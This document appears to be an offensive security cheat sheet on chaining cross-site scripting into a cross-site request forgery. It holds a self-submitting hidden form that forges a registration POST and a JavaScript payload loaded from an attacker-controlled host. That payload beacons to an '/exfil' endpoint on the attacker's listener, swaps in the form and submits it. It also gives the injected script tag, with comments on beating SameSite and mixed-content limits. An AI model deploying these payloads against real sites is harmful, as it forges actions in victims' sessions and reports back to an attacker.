Cross-Site Request Forgery (CSRF)

CSRF triggered from an XSS: the forged request is issued by a script already running on the victim's origin, so it is a same-origin request that carries the session cookies whatever their SameSite attribute, and Origin/Referer checks pass. An anti-CSRF token is the remaining server-side control, and an XSS on the same origin can usually read that too.

Form (the decoded payload: the base64 string in the JS script below decodes to this HTML, which auto-submits what appears to be a registration POST to the application's own origin)

# Decodes the base64 payload carried in the JS script below; the output is
# the auto-submitting form shown next.
printf '%s\n' "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" | base64 -d
<html>
<!-- Self-submitting CSRF form: the load handler fires the POST immediately,
     so the victim never sees or clicks anything. -->
<body onload="document.forms['pwn'].submit()">
  <!-- The action is a relative path, so the browser resolves it against the
       origin the markup is running on. That is what makes the XSS route work
       (the JS script injects this into the victim's document, so the POST is
       same-origin and carries the victim's cookies); hosted standalone on an
       attacker page it would post to the attacker origin instead, so use the
       absolute target URL there. The multipart enctype is presumably what the
       endpoint accepts — confirm against a captured legitimate request. -->
  <form name="pwn" method="POST" action="/loginLogout"
        enctype="multipart/form-data" accept-charset="UTF-8">
    <!-- Fields of the forged request. dType/type look like the action
         selector and an account type — verify their meaning in the app. -->
    <input type="hidden" name="username"  value="test" />
    <input type="hidden" name="password"  value="test" />
    <input type="hidden" name="firstName" value="test" />
    <input type="hidden" name="lastName"  value="test" />
    <input type="hidden" name="email"     value="test@test.com" />
    <input type="hidden" name="type"      value="100" />
    <input type="hidden" name="dType"     value="isRegister" />
  </form>
</body>
</html>

JS script (served as xss_script.js from the attacker-controlled host referenced in the XSS call below; replace <your-ip> with the listener address)

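// Payload served as xss_script.js and pulled in by the injected <script src>.
// `d` is the base64-encoded, self-submitting CSRF form; keeping it encoded
// means no quotes or angle brackets from the form can break the script body
// or be mangled by the XSS sink.
const d = "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";

// Notify the listener before touching the document: the form submission
// below navigates away, and a navigation can abort in-flight requests.
// keepalive lets the request outlive the page; no-cors avoids a console
// error from the cross-origin response. Best-effort, so the rejection is
// deliberately swallowed. Replace <your-ip> with the listener host.
fetch("http://<your-ip>/exfil?DONE", { mode: "no-cors", keepalive: true }).catch(() => {});

// Replace the whole document with the decoded form. Because this script runs
// on the victim's origin, the form's relative action resolves to the victim's
// origin and the POST carries its cookies whatever their SameSite attribute.
document.documentElement.innerHTML = atob(d);

// A <body onload> attribute inserted via innerHTML only fires if the page's
// load event has not happened yet, so do not rely on it: submit explicitly.
// Guarded so a payload without a form named "pwn" does not throw.
const form = document.forms["pwn"];
if (form) form.submit();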

XSS call (the payload injected into the vulnerable parameter; it loads the JS script above from the attacker host)

<!-- Inject into the XSS sink. Loads the JS script above (xss_script.js) from
     the attacker host; replace <your-ip>. NOTE(review): if the target is served
     over HTTPS, a plain http:// script is blocked as mixed content — serve the
     script (and the exfil endpoint) over HTTPS in that case. -->
<script src="http://<your-ip>/xss_script.js"></script>